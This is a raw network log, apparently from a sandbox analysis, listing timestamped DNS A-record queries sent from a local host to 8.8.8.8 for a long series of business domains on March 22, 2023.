                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.058772087 CET192.168.2.58.8.8.80x34c6Standard query (0)www.xaicom.esA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.059794903 CET192.168.2.58.8.8.80xe716Standard query (0)www.abdg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.063664913 CET192.168.2.58.8.8.80x9a4eStandard query (0)www.naoi-a.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.092175961 CET192.168.2.58.8.8.80xf397Standard query (0)www.cokocoko.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.096067905 CET192.168.2.58.8.8.80xee27Standard query (0)www.pcgrate.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.098092079 CET192.168.2.58.8.8.80x4b64Standard query (0)www.ora.ecnet.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.633172035 CET192.168.2.58.8.8.80xce5dStandard query (0)www.sjbs.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.675208092 CET192.168.2.58.8.8.80xcbe9Standard query (0)www.waldi.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.679362059 CET192.168.2.58.8.8.80xe321Standard query (0)www.aevga.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.700546026 CET192.168.2.58.8.8.80x88ebStandard query (0)www.synetik.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.992841005 CET192.168.2.58.8.8.80xf917Standard query (0)www.holleman.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:12.025428057 CET192.168.2.58.8.8.80xaf22Standard query (0)www.yocinc.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:12.710923910 CET192.168.2.58.8.8.80xda2eStandard query (0)www.fink.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:12.798250914 CET192.168.2.58.8.8.80x3a24Standard query (0)www.netcr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:12.798449039 CET192.168.2.58.8.8.80xa24eStandard query (0)www.udesign.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:12.801636934 CET192.168.2.58.8.8.80xca57Standard query (0)www.stnic.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:12.804008007 CET192.168.2.58.8.8.80x6119Standard query (0)www.maktraxx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:13.087585926 CET192.168.2.58.8.8.80x1685Standard query (0)www.jacomfg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:13.087918043 CET192.168.2.58.8.8.80xbf15Standard query (0)www.vitaindu.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:13.223598003 CET192.168.2.58.8.8.80x51c9Standard query (0)www.gpthink.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:13.224348068 CET192.168.2.58.8.8.80xe162Standard query (0)www.speelhal.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:13.265847921 CET192.168.2.58.8.8.80xd223Standard query (0)www.medisa.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:13.459264994 CET192.168.2.58.8.8.80x31aeStandard query (0)www.mobilnic.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:13.462186098 CET192.168.2.58.8.8.80xfbd6Standard query (0)www.findbc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:13.468825102 CET192.168.2.58.8.8.80x79d3Standard query (0)www.cel-cpa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:13.856273890 CET192.168.2.58.8.8.80xe81cStandard query (0)www.lrsuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:13.864936113 CET192.168.2.58.8.8.80xccbeStandard query (0)www.nqks.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:13.868154049 CET192.168.2.58.8.8.80x9f5Standard query (0)www.jchysk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:14.143744946 CET192.168.2.58.8.8.80xbf15Standard query (0)www.vitaindu.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:14.384809017 CET192.168.2.58.8.8.80xba0eStandard query (0)www.c9dd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:14.410737991 CET192.168.2.58.8.8.80xe411Standard query (0)www.usadig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:14.423279047 CET192.168.2.58.8.8.80x9f10Standard query (0)www.fe-bauer.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:14.567168951 CET192.168.2.58.8.8.80xa845Standard query (0)www.myropcb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:14.821264029 CET192.168.2.58.8.8.80xe0b8Standard query (0)www.dayvo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:14.826680899 CET192.168.2.58.8.8.80x14a9Standard query (0)www.domon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:14.982037067 CET192.168.2.58.8.8.80x2d96Standard query (0)www.koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:15.175864935 CET192.168.2.58.8.8.80xcac5Standard query (0)www.stajum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:15.180811882 CET192.168.2.58.8.8.80x594aStandard query (0)www.pwd.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:15.181546926 CET192.168.2.58.8.8.80xbf15Standard query (0)www.vitaindu.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:15.734987020 CET192.168.2.58.8.8.80xdbbfStandard query (0)www.kernsafe.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:20.344674110 CET192.168.2.58.8.8.80xcd98Standard query (0)www.iamdirt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:20.347110987 CET192.168.2.58.8.8.80x5d3dStandard query (0)www.yoruksut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:20.347238064 CET192.168.2.58.8.8.80x3c79Standard query (0)www.valselit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:20.347649097 CET192.168.2.58.8.8.80x3755Standard query (0)www.pupi.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:20.419182062 CET192.168.2.58.8.8.80xb26fStandard query (0)www.ex-olive.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:20.865113020 CET192.168.2.58.8.8.80x5231Standard query (0)www.2print.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:20.956645012 CET192.168.2.58.8.8.80x3060Standard query (0)www.wifi4all.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:21.318716049 CET192.168.2.58.8.8.80x9b30Standard query (0)www.wnsavoy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:21.336740017 CET192.168.2.58.8.8.80x1082Standard query (0)www.fcwcvt.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:21.538284063 CET192.168.2.58.8.8.80x2afcStandard query (0)www.x0c.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:22.247540951 CET192.168.2.58.8.8.80x15b8Standard query (0)www.snugpak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:22.250324011 CET192.168.2.58.8.8.80x785aStandard query (0)www.yumgiskor.kzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:22.592829943 CET192.168.2.58.8.8.80x4230Standard query (0)www.photo4b.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:22.930871010 CET192.168.2.58.8.8.80x7c78Standard query (0)www.crcsi.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:23.356884003 CET192.168.2.58.8.8.80xd941Standard query (0)www.ora-ito.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:25.784647942 CET192.168.2.58.8.8.80x7304Standard query (0)www.olras.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:25.788463116 CET192.168.2.58.8.8.80x4288Standard query (0)www.baijaku.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:25.789052010 CET192.168.2.58.8.8.80xd3f0Standard query (0)www.wkhk.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:25.791490078 CET192.168.2.58.8.8.80x331cStandard query (0)www.jenco.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:25.801405907 CET192.168.2.58.8.8.80x687dStandard query (0)www.pdqhomes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:25.802386045 CET192.168.2.58.8.8.80xd5efStandard query (0)www.ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:25.806231022 CET192.168.2.58.8.8.80x5517Standard query (0)www.pr-park.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:25.808070898 CET192.168.2.58.8.8.80xfde9Standard query (0)www.dgmna.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:25.809537888 CET192.168.2.58.8.8.80x3e4fStandard query (0)www.quadlock.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:25.815298080 CET192.168.2.58.8.8.80xbad4Standard query (0)www.fnw.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:26.045228004 CET192.168.2.58.8.8.80x9401Standard query (0)www.rs-ag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:26.049021959 CET192.168.2.58.8.8.80x35d7Standard query (0)www.mqs.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:26.512717962 CET192.168.2.58.8.8.80x1fb5Standard query (0)www.alteor.clA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:26.514097929 CET192.168.2.58.8.8.80x252cStandard query (0)www.valdal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:26.533083916 CET192.168.2.58.8.8.80x77feStandard query (0)www.item-pr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:26.533083916 CET192.168.2.58.8.8.80xee12Standard query (0)www.vazir.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:26.545783997 CET192.168.2.58.8.8.80x3354Standard query (0)www.depalo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:26.672632933 CET192.168.2.58.8.8.80xbdcfStandard query (0)www.credo.edu.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:27.319931984 CET192.168.2.58.8.8.80x95deStandard query (0)www.elpro.siA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:27.322509050 CET192.168.2.58.8.8.80x1869Standard query (0)www.nunomira.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:27.332016945 CET192.168.2.58.8.8.80x1f8cStandard query (0)www.otena.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:27.334408045 CET192.168.2.58.8.8.80xb139Standard query (0)www.petsfan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:27.363730907 CET192.168.2.58.8.8.80xe8b3Standard query (0)www.owsports.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:27.515917063 CET192.168.2.58.8.8.80xcb37Standard query (0)www.nelipak.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:27.517401934 CET192.168.2.58.8.8.80x499Standard query (0)www.tvtools.fiA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:27.517443895 CET192.168.2.58.8.8.80x838fStandard query (0)www.transsib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:27.555746078 CET192.168.2.58.8.8.80x8f7cStandard query (0)www.t-tre.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:27.555840969 CET192.168.2.58.8.8.80xa1e6Standard query (0)www.abart.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:28.309026003 CET192.168.2.58.8.8.80x7377Standard query (0)www.evcpa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:28.312710047 CET192.168.2.58.8.8.80x85acStandard query (0)www.abdg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:28.313795090 CET192.168.2.58.8.8.80xd7acStandard query (0)www.naoi-a.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:28.315403938 CET192.168.2.58.8.8.80xcd51Standard query (0)www.ora.ecnet.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:28.394687891 CET192.168.2.58.8.8.80x9d41Standard query (0)www.edimart.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:28.396836042 CET192.168.2.58.8.8.80x84dcStandard query (0)www.jroy.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:28.413312912 CET192.168.2.58.8.8.80x4183Standard query (0)www.cokocoko.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:28.741964102 CET192.168.2.58.8.8.80xd09cStandard query (0)www.vexcom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:28.751755953 CET192.168.2.58.8.8.80x5acaStandard query (0)www.xaicom.esA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:28.758426905 CET192.168.2.58.8.8.80x4871Standard query (0)www.hummer.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:29.281219006 CET192.168.2.58.8.8.80xc0c9Standard query (0)www.medius.siA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:29.413546085 CET192.168.2.58.8.8.80x7f66Standard query (0)www.pcgrate.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:29.417318106 CET192.168.2.58.8.8.80x54daStandard query (0)www.synetik.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:29.420500994 CET192.168.2.58.8.8.80x53acStandard query (0)www.sjbs.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:29.523653984 CET192.168.2.58.8.8.80x2068Standard query (0)www.aevga.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:29.524233103 CET192.168.2.58.8.8.80xfd77Standard query (0)www.waldi.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:29.603671074 CET192.168.2.58.8.8.80x9a0Standard query (0)www.speelhal.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:29.623631954 CET192.168.2.58.8.8.80x7aa4Standard query (0)www.ka-mo-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:29.905399084 CET192.168.2.58.8.8.80x5a2bStandard query (0)www.holleman.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:29.906928062 CET192.168.2.58.8.8.80xc84dStandard query (0)www.gpthink.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:29.913662910 CET192.168.2.58.8.8.80x441dStandard query (0)www.udesign.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:30.013564110 CET192.168.2.58.8.8.80x337bStandard query (0)www.jacomfg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:30.462647915 CET192.168.2.58.8.8.80xbd1bStandard query (0)www.netcr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:30.557881117 CET192.168.2.58.8.8.80xe2bbStandard query (0)www.maktraxx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:30.558017015 CET192.168.2.58.8.8.80xcdbcStandard query (0)www.stnic.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:30.595345020 CET192.168.2.58.8.8.80xd7fStandard query (0)www.fink.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:30.635870934 CET192.168.2.58.8.8.80x9a0Standard query (0)www.speelhal.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:30.794096947 CET192.168.2.58.8.8.80x9d4fStandard query (0)www.com-sit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:31.052026987 CET192.168.2.58.8.8.80x5aa5Standard query (0)www.jchysk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:31.057229042 CET192.168.2.58.8.8.80x9787Standard query (0)www.findbc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:31.224610090 CET192.168.2.58.8.8.80x2cc5Standard query (0)www.medisa.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:31.492413998 CET192.168.2.58.8.8.80x86c2Standard query (0)www.reglera.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:31.569710970 CET192.168.2.58.8.8.80x810Standard query (0)www.mobilnic.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:31.572207928 CET192.168.2.58.8.8.80x51adStandard query (0)www.cel-cpa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:31.814851999 CET192.168.2.58.8.8.80xd1a1Standard query (0)www.lrsuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:31.884902000 CET192.168.2.58.8.8.80x7891Standard query (0)www.nqks.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:31.886390924 CET192.168.2.58.8.8.80x3c1bStandard query (0)www.c9dd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:32.567136049 CET192.168.2.58.8.8.80xcb5cStandard query (0)www.dayvo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:32.567817926 CET192.168.2.58.8.8.80xc917Standard query (0)www.kernsafe.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:32.568392992 CET192.168.2.58.8.8.80x3088Standard query (0)www.usadig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:32.708623886 CET192.168.2.58.8.8.80xa590Standard query (0)www.myropcb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:32.761367083 CET192.168.2.58.8.8.80xa776Standard query (0)www.domon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:32.858416080 CET192.168.2.58.8.8.80x4866Standard query (0)www.fe-bauer.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:33.479310036 CET192.168.2.58.8.8.80x4f9aStandard query (0)www.stajum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:33.505481958 CET192.168.2.58.8.8.80xa71fStandard query (0)www.pwd.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:33.540756941 CET192.168.2.58.8.8.80x8ac1Standard query (0)www.pupi.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:33.833479881 CET192.168.2.58.8.8.80x23c2Standard query (0)www.ex-olive.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:33.841471910 CET192.168.2.58.8.8.80xe7f3Standard query (0)www.koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:34.336406946 CET192.168.2.58.8.8.80x4fb0Standard query (0)www.yoruksut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:35.022231102 CET192.168.2.58.8.8.80xf65Standard query (0)www.wnsavoy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:35.717199087 CET192.168.2.58.8.8.80x6b55Standard query (0)www.ottospm.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:36.844686985 CET192.168.2.58.8.8.80x34b2Standard query (0)www.pr-park.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:36.847812891 CET192.168.2.58.8.8.80x17dfStandard query (0)www.wkhk.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:36.851613998 CET192.168.2.58.8.8.80xaf05Standard query (0)www.pdqhomes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:36.855037928 CET192.168.2.58.8.8.80x1114Standard query (0)www.baijaku.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:36.858161926 CET192.168.2.58.8.8.80x830dStandard query (0)www.olras.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:36.861243963 CET192.168.2.58.8.8.80x1cf2Standard query (0)www.quadlock.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:36.863442898 CET192.168.2.58.8.8.80xf8e6Standard query (0)www.dgmna.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:38.583631992 CET192.168.2.58.8.8.80x6406Standard query (0)www.railbook.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:38.718831062 CET192.168.2.58.8.8.80x30b0Standard query (0)www.fnw.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:38.726788044 CET192.168.2.58.8.8.80xdd20Standard query (0)www.ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:38.737844944 CET192.168.2.58.8.8.80x8dd1Standard query (0)www.jenco.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:38.854710102 CET192.168.2.58.8.8.80xa969Standard query (0)www.mqs.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:38.868805885 CET192.168.2.58.8.8.80xbaf9Standard query (0)www.iamdirt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:38.996850014 CET192.168.2.58.8.8.80x6941Standard query (0)www.rs-ag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:39.127134085 CET192.168.2.58.8.8.80x1072Standard query (0)www.alteor.clA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:39.131004095 CET192.168.2.58.8.8.80xfabaStandard query (0)www.valdal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:39.218579054 CET192.168.2.58.8.8.80x2ad6Standard query (0)www.item-pr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:39.329868078 CET192.168.2.58.8.8.80x3f2cStandard query (0)www.wifi4all.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:39.370014906 CET192.168.2.58.8.8.80xd31dStandard query (0)www.vazir.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:39.466953993 CET192.168.2.58.8.8.80xf310Standard query (0)www.depalo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:39.469698906 CET192.168.2.58.8.8.80x97b7Standard query (0)www.credo.edu.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:39.479224920 CET192.168.2.58.8.8.80x8ad2Standard query (0)www.elpro.siA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:39.505404949 CET192.168.2.58.8.8.80x5613Standard query (0)www.fcwcvt.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:39.594948053 CET192.168.2.58.8.8.80x410Standard query (0)www.petsfan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:39.930422068 CET192.168.2.58.8.8.80x348eStandard query (0)www.owsports.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:39.930964947 CET192.168.2.58.8.8.80x17aStandard query (0)www.transsib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:39.940408945 CET192.168.2.58.8.8.80xbb5bStandard query (0)www.tvtools.fiA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:39.942140102 CET192.168.2.58.8.8.80x74fbStandard query (0)www.otena.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:40.014585018 CET192.168.2.58.8.8.80x52c2Standard query (0)www.abart.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:40.126804113 CET192.168.2.58.8.8.80x8010Standard query (0)www.snugpak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:40.434338093 CET192.168.2.58.8.8.80x6fbbStandard query (0)www.photo4b.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:40.607757092 CET192.168.2.58.8.8.80x663bStandard query (0)www.evcpa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:40.608500957 CET192.168.2.58.8.8.80x82c9Standard query (0)www.naoi-a.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:40.609078884 CET192.168.2.58.8.8.80xe243Standard query (0)www.abdg.comA (IP address)IN (0x0001)false
